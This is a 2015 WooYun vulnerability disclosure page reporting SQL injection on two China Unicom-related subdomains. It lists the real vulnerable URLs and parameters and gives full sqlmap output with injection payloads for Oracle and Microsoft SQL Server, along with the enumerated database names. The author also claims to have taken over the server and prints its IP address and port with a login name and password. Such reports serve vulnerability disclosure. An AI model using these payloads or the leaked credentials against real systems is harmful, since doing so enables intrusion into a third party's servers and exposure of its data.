当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-096615

漏洞标题:中国联通某分站SQL注射漏洞

相关厂商:中国联通

漏洞作者: term

提交时间:2015-02-12 14:42

修复时间:2015-03-29 14:44

公开时间:2015-03-29 14:44

漏洞类型:SQL注射漏洞

危害等级:低

自评Rank:1

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-12: 细节已通知厂商并且等待厂商处理中
2015-02-17: 厂商已经确认,细节仅向厂商公开
2015-02-27: 细节向核心白帽子及相关领域专家公开
2015-03-09: 细节向普通白帽子公开
2015-03-19: 细节向实习白帽子公开
2015-03-29: 细节向公众公开

简要描述:

首先说明一下,这个洞我去年10月份在补天平台提交过,今天偶然去看了下还没有修复,提交到这里并不是一洞双投,只是希望尽快让厂商修复,RANK奖励什么我都可以不要!厂商貌似隶属于中国联通山东分公司!

详细说明:

1.注入点

http://enpower.bdchina.com:8001/jxt/news/bulletinTemplate.jsp?id=1992
http://enpower.bdchina.com:8001/jxt/news/newsTemplate.jsp?id=2117


1.jpg


2.jpg


sqlmap identified the following injection points with a total of 44 HTTP(s) requ
ests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=2117 AND 6997=6997
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: id=2117 AND 7156=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||
CHR(122)||CHR(114)||CHR(102)||CHR(113)||(SELECT (CASE WHEN (7156=7156) THEN 1 EL
SE 0 END) FROM DUAL)||CHR(113)||CHR(100)||CHR(106)||CHR(102)||CHR(113)||CHR(62))
) FROM DUAL)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: id=2117 AND 4709=DBMS_PIPE.RECEIVE_MESSAGE(CHR(112)||CHR(110)||CHR(
81)||CHR(80),5)
---
[12:43:38] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[12:43:38] [WARNING] schema names are going to be used on Oracle for enumeration
as the counterpart to database names on other DBMSes
[12:43:38] [INFO] fetching database (schema) names
[12:43:39] [INFO] the SQL query used returns 28 entries
[12:43:39] [INFO] retrieved: CTXSYS
[12:43:40] [INFO] retrieved: HR
[12:43:41] [INFO] retrieved: JIAXIAOTONG
[12:43:41] [INFO] retrieved: JXTFORUM
[12:43:42] [INFO] retrieved: JXTIM
[12:43:42] [INFO] retrieved: JXTT
[12:43:43] [INFO] retrieved: MDSYS
[12:43:43] [INFO] retrieved: ODM
[12:43:44] [INFO] retrieved: ODM_MTR
[12:43:45] [INFO] retrieved: OE
[12:43:45] [INFO] retrieved: OLAPSYS
[12:43:46] [INFO] retrieved: ORDSYS
[12:43:46] [INFO] retrieved: OUTLN
[12:43:47] [INFO] retrieved: PM
[12:43:48] [INFO] retrieved: QS
[12:43:48] [INFO] retrieved: QS_CBADM
[12:43:49] [INFO] retrieved: QS_CS
[12:43:49] [INFO] retrieved: QS_ES
[12:43:50] [INFO] retrieved: QS_OS
[12:43:51] [INFO] retrieved: QS_WS
[12:43:51] [INFO] retrieved: RMAN
[12:43:52] [INFO] retrieved: SCOTT
[12:43:52] [INFO] retrieved: SH
[12:43:53] [INFO] retrieved: SYS
[12:43:54] [INFO] retrieved: SYSTEM
[12:43:54] [INFO] retrieved: WKSYS
[12:43:55] [INFO] retrieved: WMSYS
[12:43:55] [INFO] retrieved: XDB
available databases [28]:
[*] CTXSYS
[*] HR
[*] JIAXIAOTONG
[*] JXTFORUM
[*] JXTIM
[*] JXTT
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] WKSYS
[*] WMSYS
[*] XDB
[12:43:55] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 62 times
[12:43:55] [INFO] fetched data logged to text files under 'C:\sqlmap\output\enpo
wer.bdchina.com'
[*] shutting down at 12:43:55


2.注入点

http://xiangcesw.bdchina.com/taphoto.aspx?ID=7197&ZID=902
http://xiangcesw.bdchina.com/pic_all.aspx?ZID=902
http://xiangcesw.bdchina.com/photoOtherHomeFolder.aspx?ID=7197
http://xiangcesw.bdchina.com/searchFolder.aspx?BID=%E6%88%B7%E5%A4%96%20%E8%BF%90%E5%8A%A8


QQ截图20150210122958.jpg


QQ截图20150210123032.jpg


QQ截图20150210121817.jpg


sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: ID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ID=7574' AND 8430=8430 AND 'ksbY'='ksbY
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: ID=7574' AND 8238=CONVERT(INT,(SELECT CHAR(113)+CHAR(111)+CHAR(110)
+CHAR(108)+CHAR(113)+(SELECT (CASE WHEN (8238=8238) THEN CHAR(49) ELSE CHAR(48)
END))+CHAR(113)+CHAR(110)+CHAR(106)+CHAR(107)+CHAR(113))) AND 'DKvK'='DKvK
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: ID=7574'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: ID=7574' WAITFOR DELAY '0:0:5'--
---
[12:44:11] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[12:44:11] [INFO] fetching database names
[12:44:11] [INFO] the SQL query used returns 8 entries
[12:44:11] [INFO] resumed: master
[12:44:11] [INFO] resumed: model
[12:44:11] [INFO] resumed: msdb
[12:44:11] [INFO] resumed: ReportServer
[12:44:11] [INFO] resumed: ReportServerTempDB
[12:44:11] [INFO] resumed: tempdb
[12:44:11] [INFO] resumed: xiangce
[12:44:11] [INFO] resumed: xiangce_iptv
available databases [8]:
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] xiangce
[*] xiangce_iptv
[12:44:11] [INFO] fetched data logged to text files under 'C:\sqlmap\output\xian
gcesw.bdchina.com'
[*] shutting down at 12:44:11


sa权限,直接提权到服务器了!

fwq.jpg


61.156.7.61:7788 帐号caibi 密码115175


漏洞证明:

fwq.jpg

修复方案:

严格过滤!

版权声明:转载请注明来源 term@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-02-17 08:19

厂商回复:

最新状态:

暂无